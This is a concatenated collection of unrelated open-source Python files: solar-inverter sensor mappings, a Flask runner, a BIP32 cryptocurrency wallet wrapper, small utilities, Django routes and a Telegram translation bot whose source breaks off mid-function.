"6100_40666900", "grid_apparent_power_l2", unit="VA", enabled=False
)
#: Apparent Power for phase 3
grid_apparent_power_l3 = Sensor(
"6100_40666A00", "grid_apparent_power_l3", unit="VA", enabled=False
)
# AC Side - Grid measurements - Power factor
#: Grid Power factor
grid_power_factor = Sensor(
"6100_00665900", "grid_power_factor", unit="", factor=1000, enabled=False
)
#: Grid Power factor excitation
grid_power_factor_excitation = Sensor(
"6180_08465A00",
"grid_power_factor_excitation",
path=JMESPATHS_TAG,
l10n_translate=True,
enabled=False,
)
# AC Side - Grid measurements - Phase Current
#: Current for phase 1
current_l1 = Sensor("6100_40465300", "current_l1", unit="A", factor=1000, enabled=False)
#: Current for phase 2
current_l2 = Sensor("6100_40465400", "current_l2", unit="A", factor=1000, enabled=False)
#: Current for phase 3
current_l3 = Sensor("6100_40465500", "current_l3", unit="A", factor=1000, enabled=False)
#: Total Current
current_total = Sensor("6100_00664F00", "current_total", unit="A", factor=1000)
# AC Side - Grid measurements - Phase voltage
#: Voltage for phase 1
voltage_l1 = Sensor("6100_00464800", "voltage_l1", unit="V", factor=100)
#: Voltage for phase 2
voltage_l2 = Sensor("6100_00464900", "voltage_l2", unit="V", factor=100)
#: Voltage for phase 3
voltage_l3 = Sensor("6100_00464A00", "voltage_l3", unit="V", factor=100)
# AC Side - Measured values - energy
#: Total power yield from a solar installation
total_yield = Sensor("6400_00260100", "total_yield", unit="kWh", factor=1000)
#: The solar plant's yield for today
daily_yield = Sensor("6400_00262200", "daily_yield", unit="Wh")
# AC Side - Measured values - Grid measurements
#: Power supplied to grid measured by energy meter
metering_power_supplied = Sensor("6100_40463600", "metering_power_supplied", unit="W")
#: Power absorbed fromgrid measured by energy meter
metering_power_absorbed = Sensor("6100_40463700", "metering_power_absorbed", unit="W")
#: Grid frequency measured by energy meter
metering_frequency = Sensor(
"6100_00468100", "metering_frequency", unit="Hz", factor=100
)
#: Total power supplied to the grid measured by energy meter
metering_total_yield = Sensor(
"6400_00462400", "metering_total_yield", unit="kWh", factor=1000
)
#: Total power from the grid measured by energy meter
metering_total_absorbed = Sensor(
"6400_00462500", "metering_total_absorbed", unit="kWh", factor=1000
)
# AC Side - Measured values - Phase currents
#: Current for phase 1 measured by energy meter
metering_current_l1 = Sensor(
"6100_40466500", "metering_current_l1", unit="A", factor=1000
)
#: Current for phase 2 measured by energy meter
metering_current_l2 = Sensor(
"6100_40466600", "metering_current_l2", unit="A", factor=1000
)
#: Current for phase 3 measured by energy meter
metering_current_l3 = Sensor(
"6100_40466B00", "metering_current_l3", unit="A", factor=1000
)
# AC Side - Measured values - Phase voltage
#: Voltage for phase 1 measured by energy meter
metering_voltage_l1 = Sensor(
"6100_0046E500", "metering_voltage_l1", unit="V", factor=100
)
#: Voltage for phase 2 measured by energy meter
metering_voltage_l2 = Sensor(
"6100_0046E600", "metering_voltage_l2", unit="V", factor=100
)
#: Voltage for phase 3 measured by energy meter
metering_voltage_l3 = Sensor(
"6100_0046E700", "metering_voltage_l3", unit="V", factor=100
)
# AC Side - Electricity meter - Measured values - Active power feed-in
#: Active Power for phase 1 measured by energy meter
metering_active_power_l1 = Sensor("6100_0046E800", "metering_active_power_l1", unit="W")
#: Active Power for phase 2 measured by energy meter
metering_active_power_l2 = Sensor("6100_0046E900", "metering_active_power_l2", unit="W")
#: Active Power for phase 3 measured by energy meter
metering_active_power_l3 = Sensor("6100_0046EA00", "metering_active_power_l3", unit="W")
# AC Side - Electricity meter - Measured values - Active power drawn
#: Active Power Consumed for phase 1 measured by energy meter
metering_active_power_consumed_l1 = Sensor(
"6100_0046EB00", "metering_active_power_consumed_l1", unit="W"
)
#: Active Power Consumed for phase 2 measured by energy meter
metering_active_power_consumed_l2 = Sensor(
"6100_0046EC00", "metering_active_power_consumed_l2", unit="W"
)
#: Active Power Consumed for phase 3 measured by energy meter
metering_active_power_consumed_l3 = Sensor(
"6100_0046ED00", "metering_active_power_consumed_l3", unit="W"
)
# AC Side - PV generation
#: Total kWh generated to date
pv_gen_meter = Sensor("6400_0046C300", "pv_gen_meter", unit="kWh", factor=1000)
# PV Inverter Optimizers
#: Serial number of optimizer
optimizer_serial = Sensor("6800_10852600", "optimizer_serial")
#: Power supplied by optimizer
optimizer_power = Sensor("6100_40652A00", "optimizer_power", unit="W")
#: Current supplied by optimizer
optimizer_current = Sensor(
"6100_40652900", "optimizer_current", unit="A", factor=1000, enabled=False
)
#: Voltage supplied by optimizer
optimizer_voltage = Sensor(
"6100_40652800", "optimizer_voltage", unit="V", factor=100, enabled=False
)
#: Temperature of optimizer
optimizer_temp = Sensor(
"6100_40652B00", "optimizer_temp", unit="C", factor=10, enabled=False
)
# Battery (inverter) - Battery (general parameters)
#: Total battery state of charge
battery_soc_total = Sensor("6100_00295A00", "battery_soc_total", unit="%")
#: State of charge battery A
battery_soc_a = Sensor("6100_00498F00_0", "battery_soc_a", unit="%", enabled=False)
#: State of charge battery B
battery_soc_b = Sensor("6100_00498F00_1", "battery_soc_b", unit="%", enabled=False)
#: State of charge battery C
battery_soc_c = Sensor("6100_00498F00_2", "battery_soc_c", unit="%", enabled=False)
#: Voltage battery A
battery_voltage_a = Sensor("6100_00495C00_0", "battery_voltage_a", unit="V", factor=100)
#: Voltage battery B
battery_voltage_b = Sensor("6100_00495C00_1", "battery_voltage_b", unit="V", factor=100)
#: Voltage battery C
battery_voltage_c = Sensor("6100_00495C00_2", "battery_voltage_c", unit="V", factor=100)
#: Current battery A
battery_current_a = Sensor(
"6100_40495D00_0", "battery_current_a", unit="A", factor=1000
)
#: Current battery B
battery_current_b = Sensor(
"6100_40495D00_1", "battery_current_b", unit="A", factor=1000
)
#: Current battery C
battery_current_c = Sensor(
"6100_40495D00_2", "battery_current_c", unit="A", factor=1000
)
#: Temperature battery A
battery_temp_a = Sensor("6100_40495B00_0", "battery_temp_a", unit="C", factor=10)
#: Temperature battery B
battery_temp_b = Sensor("6100_40495B00_1", "battery_temp_b", unit="C", factor=10)
#: Temperature battery C
battery_temp_c = Sensor("6100_40495B00_2", "battery_temp_c", unit="C", factor=10)
#: Battery status operating mode
battery_status_operating_mode = Sensor(
"6180_08495E00",
"battery_status_operating_mode",
path=JMESPATHS_TAG,
l10n_translate=True,
)
# Battery (inverter) - Diagnosis
#: Total battery capacity
battery_capacity_total = Sensor("6100_00696E00", "battery_capacity_total", unit="%")
#: Capacity battery A
battery_capacity_a = Sensor(
"6100_00499100_0", "battery_capacity_a", unit="%", enabled=False
)
#: Capacity battery B
battery_capacity_b = Sensor(
"6100_00499100_1", "battery_capacity_b", unit="%", enabled=False
)
#: Capacity battery C
battery_capacity_c = Sensor(
"6100_00499100_2", "battery_capacity_c", unit="%", enabled=False
)
# Battery (inverter) - Charge (voltage)
#: Charging voltage battery A
battery_charging_voltage_a = Sensor(
"6102_00493500_0", "battery_charging_voltage_a", unit="V", factor=100
)
#: Charging voltage battery B
battery_charging_voltage_b = Sensor(
"6102_00493500_1", "battery_charging_voltage_b", unit="V", factor=100
)
#: Charging voltage battery C
battery_charging_voltage_c = Sensor(
"6102_00493500_2", "battery_charging_voltage_c", unit="V", factor=100
)
# Battery (inverter) - Battery charge (power & energy)
#: Total charging power
battery_power_charge_total = Sensor(
"6100_00496900", "battery_power_charge_total", unit="W"
)
#: Charging power battery A
battery_power_charge_a = Sensor(
"6100_00499300_0", "battery_power_charge_a", unit="W", enabled=False
)
#: Charging power battery B
battery_power_charge_b = Sensor(
"6100_00499300_1", "battery_power_charge_b", unit="W", enabled=False
)
#: Charging power battery C
battery_power_charge_c = Sensor(
"6100_00499300_2", "battery_power_charge_c", unit="W", enabled=False
)
#: Total charge
battery_charge_total = Sensor(
"6400_00496700", "battery_charge_total", unit="kWh", factor=1000
)
#: Charge battery A
battery_charge_a = Sensor(
"6400_00499500_0", "battery_charge_a", unit="kWh", factor=1000, enabled=False
)
#: Charge battery B
battery_charge_b = Sensor(
"6400_00499500_1", "battery_charge_b", unit="kWh", factor=1000, enabled=False
)
#: Charge battery C
battery_charge_c = Sensor(
"6400_00499500_2", "battery_charge_c", unit="kWh", factor=1000, enabled=False
)
# Battery (inverter) - Battery discharge (power & energy)
#: Total discharging power
battery_power_discharge_total = Sensor(
"6100_00496A00", "battery_power_discharge_total", unit="W"
)
#: Disharging power battery A
battery_power_discharge_a = Sensor(
"6100_00499400_0", "battery_power_discharge_a", unit="W", enabled=False
)
#: Disharging power battery B
battery_power_discharge_b = Sensor(
"6100_00499400_1", "battery_power_discharge_b", unit="W", enabled=False
)
#: Disharging power battery C
battery_power_discharge_c = Sensor(
"6100_00499400_2", "battery_power_discharge_c", unit="W", enabled=False
)
#: Total discharge
battery_discharge_total = Sensor(
"6400_00496800", "battery_discharge_total", unit="kWh", factor=1000
)
#: Discharge battery A
battery_discharge_a = Sensor(
"6400_00499600_0", "battery_discharge_a", unit="kWh", factor=1000, enabled=False
)
#: Discharge battery B
battery_discharge_b = Sensor(
"6400_00499600_1", "battery_discharge_b", unit="kWh", factor=1000, enabled=False
)
#: Discharge battery C
battery_discharge_c = Sensor(
"6400_00499600_2", "battery_discharge_c", unit="kWh", factor=1000, enabled=False
)
# Device Parameters
# Type Label - Type Label
#: Device serial number
serial_number = Sensor("6800_00A21E00", "serial_number")
#: Device name
device_name = Sensor("6800_10821E00", "device_name")
#: Device type
device_type = Sensor(
"6800_08822000", "device_type", path=JMESPATHS_TAG, l10n_translate=True
)
#: Device manufactorer
device_manufacturer = Sensor(
"6800_08822B00", "device_manufacturer", path=JMESPATHS_TAG, l10n_translate=True
)
#: Device software version
device_sw_version = Sensor("6800_00823400", "device_sw_version")
# Device - Inverter
#: Power limit of the Inverter
inverter_power_limit = Sensor("6800_00832A00", "inverter_power_limit", unit="W")
# System communication - Meter on Speedwire
#: Serial number of energy meter
energy_meter = Sensor("6800_008AA300", "energy_meter")
sensor_map = {
DEVCLASS_INVERTER: [
status,
pv_power_a,
pv_power_b,
pv_voltage_a,
pv_voltage_b,
pv_current_a,
pv_current_b,
grid_power,
frequency,
current_l1,
current_l2,
current_l3,
voltage_l1,
voltage_l2,
voltage_l3,
power_l1,
power_l2,
power_l3,
total_yield,
daily_yield,
pv_gen_meter,
],
OPTIMIZERS_VIA_INVERTER: [
optimizer_power,
optimizer_current,
optimizer_voltage,
optimizer_temp,
],
ENERGY_METER_VIA_INVERTER: [
metering_power_supplied,
metering_power_absorbed,
metering_frequency,
metering_total_yield,
metering_total_absorbed,
metering_current_l1,
metering_current_l2,
metering_current_l3,
metering_voltage_l1,
metering_voltage_l2,
metering_voltage_l3,
metering_active_power_l1,
metering_active_power_l2,
metering_active_power_l3,
metering_active_power_consumed_l1,
metering_active_power_consumed_l2,
metering_active_power_consumed_l3,
],
DEVCLASS_BATTERY: [
battery_voltage_a,
battery_voltage_b,
battery_voltage_c,
battery_charging_voltage_a,
battery_charging_voltage_b,
battery_charging_voltage_c,
battery_current_a,
battery_current_b,
battery_current_c,
inverter_power_limit,
battery_power_charge_total,
battery_power_charge_a,
battery_power_charge_b,
battery_power_charge_c,
battery_power_discharge_total,
battery_power_discharge_a,
battery_power_discharge_b,
battery_power_discharge_c,
grid_reactive_power,
grid_reactive_power_l1,
grid_reactive_power_l2,
grid_reactive_power_l3,
grid_apparent_power,
grid_apparent_power_l1,
grid_apparent_power_l2,
grid_apparent_power_l3,
grid_power_factor,
grid_power_factor_excitation,
battery_charge_total,
battery_charge_a,
battery_charge_b,
battery_charge_c,
battery_discharge_total,
battery_discharge_a,
battery_discharge_b,
battery_discharge_c,
battery_soc_total,
battery_soc_a,
battery_soc_b,
battery_soc_c,
battery_capacity_total,
battery_capacity_a,
battery_capacity_b,
battery_capacity_c,
battery_temp_a,
battery_temp_b,
battery_temp_c,
insulation_residual_current,
inverter_condition,
operating_status_general,
battery_status_operating_mode,
grid_relay_status,
grid_connection_status,
inverter_system_init,
grid_power,
voltage_l1,
voltage_l2,
voltage_l3,
current_l1,
current_l2,
current_l3,
current_total,
frequency,
status,
],
DEVCLASS_ENERGY_METER: [
status,
grid_power,
frequency,
current_l1,
current_l2,
current_l3,
voltage_l1,
voltage_l2,
voltage_l3,
power_l1,
power_l2,
power_l3,
],
DEVICE_INFO: [
serial_number,
device_name,
device_type,
device_manufacturer,
device_sw_version,
],
}
| StarcoderdataPython |
11275227 | <gh_stars>1-10
"""
This script runs the webapp application using a development server.
"""
from os import environ
from webapp import app
from config import DEBUG
if __name__ == '__main__':
HOST = environ.get('SERVER_HOST', 'localhost')
try:
PORT = int(environ.get('SERVER_PORT', '5000'))
except ValueError:
PORT = 5000
app.run(HOST, PORT, debug=DEBUG)
| StarcoderdataPython |
4979330 | from pycoin.key.BIP32Node import *
from . import config
from .interfaces.counterwalletseed import mnemonicToEntropy
import time
import json
import os
from .errors import PyPayWalletError
NETCODES = {"mainnet": "BTC", "testnet": "XTN"}
#To Do: enable autosweep, privkey_mode only
#sweep address function
#sweep branch function
class PyPayWallet(BIP32Node):
"""
Wallet wrapper around the Pycoin implementation. (Pycoin is a little heavier of a dependency than we need, but it already supports python3 and keypath-address handling).
The savePrivate() and savePublic() methods will save the public and/or private keys available to this wallet in an encrypted file using simplecrypt. Note: You do not need to have the privatekeys to generate new addresses.
The MasterKey or the PublicKey for the branch specified in the configfile must be loaded at startup, branches take default numbers. Currently hardened branch's are not supported (since hardened branches require the root-key to be a private-key which should not be used).
"""
@classmethod
def _getNetcode(cls):
return NETCODES['testnet' if config.TESTNET else 'mainnet']
@classmethod
def fromEntropy(cls, seed, netcode=None):
if not netcode:
netcode = cls._getNetcode()
return BIP32Node.from_master_secret(seed, netcode)
@classmethod
def fromMnemonic(cls, mnemonic, mnemonic_type = None, netcode=None):
if not netcode:
netcode = cls._getNetcode()
if not mnemonic_type:
mnemonic_type = config.DEFAULT_MNEMONIC_TYPE
exec("from .interfaces.%s import mnemonicToEntropy" %mnemonic_type)
seed = mnemonicToEntropy(mnemonic)
return cls.from_master_secret(seed, netcode=netcode)
@classmethod
def fromFile(cls, password=None, file_dir=None, file_name=None, netcode=None):
if file_dir is None:
file_dir = config.DATA_DIR
if file_name is None:
file_name = config.DEFAULT_WALLET_FILE
if netcode is None:
netcode = cls._getNetcode()
with open(os.path.join(file_dir, file_name), 'rb') as rfile:
data = rfile.read()
try:
if isinstance(data, bytes):
data = data.decode('utf-8')
wallet = json.loads(data)
except (TypeError, UnicodeDecodeError):
data = cls._decryptFile(password, data)
wallet = json.loads(data)
return cls.fromHwif((wallet.get('privkey') or wallet.get('pubkey')), keypath=wallet.get('keypath'), netcode=netcode)
fromEncryptedFile = fromFile
@classmethod
def _decryptFile(cls, password, data):
import simplecrypt
return simplecrypt.decrypt(password, data).decode('utf-8')
@classmethod
def fromHwif(cls, b58_str, keypath=None, netcode = None):
node = BIP32Node.from_hwif(b58_str)
return cls.fromBIP32Node(node, keypath, netcode)
#Go figure why BIP32Node won't instantiate from an instance of itself...
@classmethod
def fromBIP32Node(cls, W, keypath=None, netcode = None):
secret_exponent = (W._secret_exponent or None)
public_pair = (W._public_pair if not W._secret_exponent else None)
if not netcode:
netcode = cls._getNetcode() or W._netcode
return PyPayWallet(
netcode,
W._chain_code,
W._depth,
W._parent_fingerprint,
W._child_index,
secret_exponent=secret_exponent,
public_pair=public_pair,
keypath= (keypath or W.__dict__.get('keypath'))
)
def _toFile(self, data, file_dir = None, file_name =None, force = False ):
if file_dir is None:
file_dir = config.DATA_DIR
if file_name is None:
file_name = config.DEFAULT_WALLET_FILE
print(file_dir, file_name)
target = os.path.join(file_dir, file_name)
if os.path.isfile(target) and not force:
raise PyPayWalletError("Could not save to file because file already exists and force=True was not specified")
with open(target, 'wb') as wfile:
result = wfile.write(data)
assert(len(data) == result)
return result
def jsonForWallet(self, store_private=False):
return json.dumps({
"keypath": self.keypath,
"pubkey": self.hwif(),
"privkey": (self.hwif(True) if (self.is_private() and store_private ) else None)
}).encode('utf-8')
def toFile(self, password=<PASSWORD>, store_private=False, **kwargs):
payload = self.jsonForWallet(store_private)
if password:
import simplecrypt
payload = simplecrypt.encrypt(password, payload)
self._toFile(payload, **kwargs)
def toEncryptedFile(self, password=<PASSWORD>, store_private=False, **kwargs):
self.toFile(password, store_private, **kwargs)
def getCurrentAddress(self):
'''return the public address for the current path'''
return self.subkey_for_path(str(self.keypath)).address()
def getNewAddress(self):
'''return public address after incrementing path by 1'''
self.keypath.incr()
return self.getCurrentAddress()
def __init__(self, *args, keypath=None, **kwargs):
if not keypath:
keypath = config.KEYPATH or config.DEFAULT_KEYPATH
self.keypath = KeyPath(keypath)
BIP32Node.__init__(self, *args, **kwargs)
class KeyPath(list):
"""An address keypath object with an increment function"""
def __init__(self, l, *args):
if type(l) is str:
l = (int(i) for i in l.split('/'))
elif not l:
l =[]
list.__init__(self, l,*args)
def __repr__(self):
return "KeyPath('%s')" %self
def __str__(self):
return str('/'.join([str(i) for i in self]))
def incr(self, x=1, pos=-1):
'''When called with no arguments increments the right-most path by one'''
self[pos] += (x if self[pos] >= 0 else -x)
def set_pos(self, x, pos):
self[pos] = int(x)
# def dmc(x, y):
# x.__dict__[y.__name__] = y.__get__(x, x.__class__)
| StarcoderdataPython |
278266 | <gh_stars>1-10
#!/usr/bin/env python
import csv
import sys
REMOVE_COLUMNS = [
'special_designations',
'record_created',
'record_modified',
'user_modified',
]
def main():
reader = csv.DictReader(sys.stdin)
outnames = [f for f in reader.fieldnames if f not in REMOVE_COLUMNS]
writer = csv.DictWriter(sys.stdout, outnames)
writer.writeheader()
for row in reader:
try:
for rem in REMOVE_COLUMNS:
del row[rem]
writer.writerow(row)
except ValueError:
pass
main()
| StarcoderdataPython |
1839418 | <gh_stars>10-100
# -*- coding: utf-8 -*-
# @Time : DATE:2021/10/9
# @Author : yan
# @Email : <EMAIL>
# @File : 04_bspline_fitting.py
import pclpy
from pclpy import pcl
import numpy as np
import sys
def PointCloud2Vector3d(cloud, data):
pass
def visualizeCurve(curve, surface, viewer):
pass
if __name__ == '__main__':
if len(sys.argv) < 3:
print('Usage: pcl_example_nurbs_fitting_surface pcd<PointXYZ>-in-file 3dm-out-file')
exit(0)
pcd_file = sys.argv[1]
file_3dm = sys.argv[2]
viewer = pcl.visualization.PCLVisualizer()
viewer.setSize(800, 600)
# 加载点云数据
cloud = pcl.PointCloud.PointXYZ()
if pcl.io.loadPCDFile(pcd_file, cloud) < 0:
print(' PCD file not found.')
exit(-1)
blue = pcl.visualization.PointCloudColorHandlerCustom.PointXYZ(cloud, 0.0, 0.0, 255.0)
viewer.addPointCloud(cloud, blue, "cloud")
viewer.setPointCloudRenderingProperties(0, 3, "cloud")
while not viewer.wasStopped():
viewer.spinOnce(10)
| StarcoderdataPython |
4804961 | import requests
import os
import json
"""
Defines a connection to a Persist Key/Value Store
"""
class PersistStore:
def __init__(self):
self.base_url = 'https://beepboophq.com/api/v1/persist/kv'
self.token = os.getenv("BEEPBOOP_TOKEN", "")
def list_keys(self):
r = requests.get(self.base_url, headers={'Authorization': 'Bearer {}'.format(self.token)})
return r.json()
def set_value(self, key, value):
r = requests.put(self.base_url + '/{}'.format(key), headers={'Authorization': 'Bearer {}'.format(self.token)}, data=json.dumps({'value': value}))
if r.status_code != 200:
print r.text
def get_value(self, key):
r = requests.get(self.base_url + '/{}'.format(key), headers={'Authorization': 'Bearer {}'.format(self.token)})
return r.json()['value']
| StarcoderdataPython |
1887741 | <filename>WEB21-1-12/WEB2/tempcomp/urls.py<gh_stars>0
from django.urls import path, re_path
from . import views
urlpatterns = [
re_path(r'^show_history/$',views.show_tempcomp_history,),
re_path(r'^clear_history/$',views.clear_tempcomp_history,),
re_path(r'^set_history/$',views.set_tempcomp_history,),
re_path(r'^upload/$',views.tempcomp_upload,),
re_path('^export/$',views.big_file_download,)
]
| StarcoderdataPython |
9798807 | <filename>start.py<gh_stars>1-10
#!/usr/bin/python3.7
import re
import logging
from sys import path as syspath
from aiogram import Bot, Dispatcher, executor, types
from aiogram.types import InlineQuery, InputTextMessageContent, InlineQueryResultArticle, \
InlineKeyboardButton
from configparser import ConfigParser
from stathat import StatHat
from sentry_sdk import init, capture_message
from clean import output
from gtrans import trans, trans_auto
from termcolor import cprint
# 初始化 bot
try:
cfg = ConfigParser()
cfg.read(syspath[0] + '/config.ini')
API_TOKEN = cfg.get('bot', 'token')
ADMIN_ID = cfg.get('bot', 'admin')
PROXY_URL = cfg.get('bot', 'proxy')
STAT = cfg.get('stat', 'enabled') # 不启用则不使用统计
STAT_ACCOUNT = cfg.get('stat', 'account')
STAT_INSTANCE = cfg.get('stat', 'instance')
SENTRY_SDK = cfg.get('sentry', 'sdk')
GROUP_LIST = cfg.get('group', 'enabled')
LANG = cfg.get('lang', 'destination') # 暂时没有使用
except Exception:
cprint('Config file error, exit...', 'white', 'on_red')
capture_message('Config file error, exit...')
print(Exception)
exit()
logging.basicConfig(level=logging.INFO)
bot = Bot(token=API_TOKEN, proxy=PROXY_URL)
dp = Dispatcher(bot)
init(SENTRY_SDK, traces_sample_rate=1.0)
delete_btn = types.InlineKeyboardMarkup(resize_keyboard=True, selective=True)
# delete_btn.insert(InlineKeyboardButton(text='👍', callback_data='vote'))
delete_btn.insert(InlineKeyboardButton(text='🗑️', callback_data='delete'))
# 定义函数
@dp.callback_query_handler(text='delete')
async def _(call: types.CallbackQuery):
await call.message.delete()
await call.answer(text="该消息已删除")
def translate_text(text, lang='zh-CN', detect=1, type=0):
if type == 0: # Specific language
translated_cleaned = output(trans(text, lang))
elif type == 1: # Auto Translation
translated_cleaned = output(trans_auto(text))
else: # To Chinese
translated_cleaned = output(trans(text, lang))
if STAT:
try:
stathat = StatHat()
stathat.ez_post_count(STAT_ACCOUNT, STAT_INSTANCE, 1)
except Exception as e:
cprint('Request susceed but stat failed!' + str(e), 'white', 'on_red')
capture_message('Request susceed but stat failed!')
return translated_cleaned
def translate_msg(message: types.Message,
offset: int = 0,
lang: str = None,
reg: str = None):
if message.reply_to_message: # 如果是回复则取所回复消息文本
text = message.reply_to_message.text
else: # 如果不是回复则取命令后文本
text = message.text[offset:] # 去除命令文本
try:
text = text.replace('@xvkes_translate_bot', '').strip()
except:
pass
if reg:
text = re.sub(reg, '', text)
if len(text) == 0:
if message.reply_to_message:
clog(message)
capture_message(message)
result = translate_text(text, lang)
return result
else:
result = '''忘记添加需要翻译的文本?请在命令后添加需要翻译的话,例如:
/en 你好
'''
return \
result
else:
clog(message)
capture_message(message)
result = translate_text(text, lang)
print(result)
return \
result
def translate_auto(message: types.Message,
offset: int = 0,
lang: str = None,
reg: str = None):
if message.reply_to_message and (len(
re.sub(
r'^(translate|trans|tran|翻译|中文|Chinese|zh|英文|英语|English|en)',
"", message.text)) <= 1): # 如果是回复则取所回复消息文本
text = message.reply_to_message.text
else: # 如果不是回复则取命令后文本
text = message.text[offset:] # 去除命令文本
text = text.replace('@xvkes_translate_bot', '').strip()
if reg:
text = re.sub(reg, '', text)
if len(text) == 0:
if message.reply_to_message:
clog(message)
capture_message(message)
result = translate_text(text)
return result
else:
result = '''忘记添加需要翻译的文本?请在命令后添加需要翻译的话,例如:
/en 你好
'''
return \
result
else:
clog(message)
capture_message(message)
result = trans_auto(text)
print(result)
return result
def clog(message):
chat_type = message.chat.type
user = message.from_user.username
user_id = message.from_user.id
group = message.chat.title
group_id = message.chat.id
chat_name = message.chat.username or message.from_user.username
if group:
log_msg = f'[{chat_type}, %{group}, %{group_id}, &{chat_name}, \@{user}, #{user_id}] {message.text}'
cprint(log_msg, 'white', 'on_cyan')
capture_message(log_msg)
else:
log_msg = f'[{chat_type}, @{chat_name}, #{user_id}] {message.text} '
cprint(log_msg, 'white', 'on_cyan')
capture_message(log_msg)
####################################################################################################
# 欢迎词
@dp.message_handler(commands=['start', 'welcome', 'about', 'help'])
async def command_start(message: types.Message):
intro = '''使用说明:
- 私聊机器人,自动翻译文字消息;
- 群聊中添加机器人,使用命令翻译指定消息;
- 任意聊天框,输入 @xvkes_translate_bot 实时翻译。
使用样例:
/fy 检测语言并翻译
/zh Translate a sentence into Chinese.
/en 翻译到英文
最近更新
- [2021.05.25] 补全配置模板,增加代理'''
await bot.send_chat_action(message.chat.id, action="typing")
await message.answer(intro)
####################################################################################################
# 翻译命令
####################################################################################################
# 中英文
@dp.message_handler(commands=['fy', 'tr', '翻译'])
async def command_fy(message: types.Message):
await bot.send_chat_action(message.chat.id, action="typing")
result = translate_msg(message, 3) # None -> Chinese + English
await message.reply(result, reply_markup=delete_btn)
# 中文
@dp.message_handler(commands=['zh'])
async def command_zh(message: types.Message):
await bot.send_chat_action(message.chat.id, action="typing")
result = translate_msg(message, 3, 'zh')
await message.reply(result, reply_markup=delete_btn)
# 英文
@dp.message_handler(commands=['en'])
async def command_en(message: types.Message):
await bot.send_chat_action(message.chat.id, action="typing")
result = translate_msg(message, 3, 'en')
await message.reply(result, reply_markup=delete_btn)
@dp.message_handler(commands=['id'])
async def command_id(message: types.Message):
await bot.send_chat_action(message.chat.id, action="typing")
result = message.chat.id
await message.reply(result, reply_markup=delete_btn)
####################################################################################################
# 自然指令
####################################################################################################
@dp.message_handler(regexp='^(translate|trans|tran|翻译) ')
async def keyword_fy(message: types.Message):
result = translate_msg(message, reg='^(translate|trans|tran|翻译) ')
await bot.send_chat_action(message.chat.id, action="typing")
await message.reply(result, reply_markup=delete_btn)
@dp.message_handler(regexp='^(英文|英语|English|en) ')
async def keyword_en(message: types.Message):
result = translate_msg(message, lang='en', reg='^(英文|英语|English|en) ')
await bot.send_chat_action(message.chat.id, action="typing")
await message.reply(result, reply_markup=delete_btn)
@dp.message_handler(regexp='^(中文|Chinese|zh) ')
async def keyword_zh(message: types.Message):
result = translate_msg(message, lang='zh', reg='^(中文|Chinese|zh) ')
await bot.send_chat_action(message.chat.id, action="typing")
await message.reply(result, reply_markup=delete_btn)
@dp.message_handler(regexp='^(translate|trans|tran|翻译)')
async def reply_keyword_fy(message: types.Message):
if message.reply_to_message:
result = translate_msg(message, reg='^(translate|trans|tran|翻译)')
await bot.send_chat_action(message.chat.id, action="typing")
await message.reply(result, reply_markup=delete_btn)
@dp.message_handler(regexp='^(英文|English|en)')
async def reply_keyword_en(message: types.Message):
if message.reply_to_message:
result = translate_msg(message, lang='en', reg='^(英文|English|en)')
await bot.send_chat_action(message.chat.id, action="typing")
await message.reply(result, reply_markup=delete_btn)
@dp.message_handler(regexp='^(中文|Chinese|zh)')
async def reply_keyword_zh(message: types.Message):
if message.reply_to_message:
result = translate_msg(message, lang='zh', reg='^(中文|Chinese|zh)')
await bot.send_chat_action(message.chat.id, action="typing")
await message.reply(result, reply_markup=delete_btn)
####################################################################################################
# 私聊自动检测语言并翻译
####################################################################################################
@dp.callback_query_handler(text='translate')
async def query_translate(call: types.CallbackQuery):
origin_msg = call.message.text.split('▸')[1].split('\n')[0]
translated_msg = call.message.text.split('▸')[-1]
# await bot.send_chat_action(message.chat.id, action="typing")
await call.answer(text="消息已翻译 Message translated")
await bot.edit_message_text("`" + call.message.text.split('▸')[0] + "`" + \
output(trans_auto(translated_msg)), call.message.chat.id, call.message.message_id,
parse_mode="markdown")
@dp.callback_query_handler(text=['zh', 'en', 'ja', 'ru', 'vi'])
async def query_specify(call: types.CallbackQuery):
languages = {'zh': '🇨🇳', 'en': '🇺🇸', 'ja': '🇯🇵', 'ru': '🇷🇺', 'vi': '🇻🇳'}
# await bot.send_chat_action(message.chat.id, action="typing")
reply_message = call.message.reply_to_message
reply_text = reply_message.text
action_btn = types.InlineKeyboardMarkup(resize_keyboard=True,
selective=True)
action_btn.insert(
InlineKeyboardButton(text=f'{languages[call.data]}',
callback_data='select'))
action_btn.insert(InlineKeyboardButton(text='🗑️', callback_data='del'))
await call.answer(text=f"{languages[call.data]} 正在翻译 Translating...")
await bot.edit_message_text(output(translate_text(reply_text, call.data)), call.message.chat.id,
call.message.message_id, parse_mode="markdown", reply_markup=action_btn)
# await call.answer(text="消息已翻译 Message translated")
@dp.callback_query_handler(text='del')
async def query_delete(call: types.CallbackQuery):
# await bot.send_chat_action(message.chat.id, action="typing")
await call.answer(text="消息已删除 Message deleted")
await call.message.delete()
@dp.callback_query_handler(text='select')
async def query_select(call: types.CallbackQuery):
# await bot.send_chat_action(message.chat.id, action="typing")
action_btn = types.InlineKeyboardMarkup(resize_keyboard=True,
selective=True)
action_btn.insert(InlineKeyboardButton(text='🇨🇳', callback_data='zh'))
action_btn.insert(InlineKeyboardButton(text='🇺🇸', callback_data='en'))
action_btn.insert(InlineKeyboardButton(text='🇯🇵', callback_data='ja'))
action_btn.insert(InlineKeyboardButton(text='🇷🇺', callback_data='ru'))
action_btn.insert(InlineKeyboardButton(text='🇻🇳', callback_data='vi'))
action_btn.insert(InlineKeyboardButton(text='🗑️', callback_data='del'))
await call.answer(text="请选择一种语言 Please select a language")
await bot.edit_message_text(call.message.text, call.message.chat.id,
call.message.message_id, parse_mode="markdown",
disable_web_page_preview=True, reply_markup=action_btn)
@dp.callback_query_handler(text='mute')
async def query_mute(call: types.CallbackQuery):
origin_msg = call.message.text.split('▸')[1].split('\n')[0]
# await bot.send_chat_action(message.chat.id, action="typing")
await call.answer(text="显示原消息 Original message showed")
await bot.edit_message_text(origin_msg, call.message.chat.id, call.message.message_id,
parse_mode="markdown")
@dp.message_handler(content_types=types.message.ContentType.TEXT)
async def text_translate(message: types.Message):
chat_type = message.chat.type
chat_id = message.chat.id
action_btn = types.InlineKeyboardMarkup(resize_keyboard=True,
selective=True)
action_btn.insert(
InlineKeyboardButton(text='🇨🇳🇺🇸🇯🇵', callback_data='select'))
action_btn.insert(InlineKeyboardButton(text='🗑️', callback_data='del'))
if chat_type == 'private':
await bot.send_chat_action(message.chat.id, action="typing")
capture_message(
